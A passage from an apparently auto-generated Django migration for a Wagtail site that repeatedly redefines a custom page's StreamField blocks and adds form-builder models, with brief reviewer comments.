wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# Redefine CustomPage.content: adds 'whitespaceblock' (a StructBlock with a
# single integer 'height') for vertical spacing.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# One input field belonging to a FormPage (Wagtail form builder).
# Mirrors wagtail.wagtailforms.models.AbstractFormField; the ParentalKey
# to the owning page is added by a separate AddField operation below.
migrations.CreateModel(
name='FormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
# Position of the field within its form; drives the 'ordering' Meta option.
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
# Widget type rendered for this field; fixed choice set from Wagtail's form builder.
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
# Only meaningful for the multi-option field types (see help_text).
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
],
options={
'abstract': False,
'ordering': ['sort_order'],
},
),
# A Wagtail page type that renders a user-submittable form and optionally
# emails submissions; subclasses wagtailcore.Page (see `bases` below).
migrations.CreateModel(
name='FormPage',
fields=[
# Multi-table inheritance link to the base wagtailcore.Page row.
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
# Email-notification settings; all optional (blank=True).
('to_address', models.CharField(blank=True, help_text='Optional - form submissions will be emailed to these addresses. Separate multiple addresses by comma.', max_length=255, verbose_name='to address')),
('from_address', models.CharField(blank=True, max_length=255, verbose_name='from address')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
# Rich-text shown before the form and after successful submission.
('intro', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('thank_you_text', wagtail.wagtailcore.fields.RichTextField(blank=True)),
# Optional override for the form's HTML action attribute; defaults to the page slug.
('action', models.CharField(blank=True, help_text='Optional action for the form. This will default to the slug.', max_length=1000)),
('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
# Attach FormField to its owning FormPage. modelcluster's ParentalKey (rather
# than a plain ForeignKey) lets form fields be edited inline with the page in
# the Wagtail admin; reverse accessor is FormPage.form_fields.
migrations.AddField(
model_name='formfield',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='common.FormPage'),
),
# Drop the 'title' column from the Person model. NOTE(review): destructive —
# the column's data is lost on migrate and cannot be restored by rolling back.
migrations.RemoveField(
model_name='person',
name='title',
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock()))))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('whitespaceblock', wagtail.wagtailcore.blocks.StructBlock((('height', wagtail.wagtailcore.blocks.IntegerBlock()),))), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(())), ('code_block', wagtail.wagtailcore.blocks.StructBlock((('language', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('python', 'python'), ('css', 'css'), ('sql', 'sql'), ('javascript', 'javascript'), ('clike', 'clike'), ('markup', 'markup'), ('java', 'java')], default='python')), ('codes', wagtail.wagtailcore.blocks.TextBlock())))), ('calender_blog', wagtail.wagtailcore.blocks.StructBlock((('source', wagtail.wagtailcore.blocks.CharBlock(help_text='Such as: calendar@cos.io', max_length=255, required=True)),)))), blank=True, null=True),
),
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'Small'), ('max_width:250px;max-height:250px', 'Medium'), ('max_width:250px;max-height:250px;padding-top:20px', 'Medium Pushed Down 20px'), ('height:auto', 'Shrink to Fit')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. 
